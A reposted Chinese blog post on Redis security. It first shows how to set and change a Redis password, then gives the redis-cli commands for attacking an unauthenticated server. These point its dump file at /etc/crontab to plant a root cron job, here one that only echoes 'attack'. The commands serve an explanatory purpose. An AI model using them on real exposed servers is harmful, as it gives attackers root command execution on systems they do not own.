Redis服务器设置密码和无密码攻击

最新推荐文章于 2022-08-24 00:12:20 发布

weixin_34112030

最新推荐文章于 2022-08-24 00:12:20 发布

阅读量896

点赞数

文章标签：数据库

原文链接：http://blog.51cto.com/9473774/2358479

版权

一、设置密码

方法1：编辑配置文件(需要重启redis才能生效)

vi /usr/local/redis/conf/redis.conf

requirepass 'test123'

设置密码后操作redis的方法

(1)交互操作

redis-cli
auth 'test123'

(2)非交互式的操作

redis-cli -a 'test123' info

方法2：(无需重启redis):

auth 'test123'   #加完密码后，需要使用auth去认证才能操作redis服务器
config get requirepass #获取指定配置
config set requirepass '' #无需重启redis服务器将密码置为空，平滑更新配置
config rewrite   #更新配置完后需要写入到配置文件，预防重启后配置失效
config set requirepass 'tester123' #重新设置密码

二、攻击无密码redis服务器(rdb存储)

redis-cli -h xxx.xxx.xxx.xxx config set dir /etc/
redis-cli -h xxx.xxx.xxx.xxx config set dbfilename "crontab"

vi /tmp/attack的内容(需要四个回车)

* * * * * root echo 'attack'

cat /tmp/attack | redis-cli -h xxx.xxx.xxx.xxx -x set attack  #-x会从标准输出中读取
redis-cli -h 127.0.0.1 save

转载于:https://blog.51cto.com/9473774/2358479

weixin_34112030

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Redis服务器设置密码和无密码攻击

一、设置密码方法1：编辑配置文件(需要重启redis才能生效)vi /usr/local/redis/conf/redis.confrequirepass'test123'设置密码后操作redis的方法(1)交互操作redis-cliauth'test123'(2)非交互式的操作redis-cli-a'test123'info方法2：(无需重启redis):aut...
复制链接

扫一扫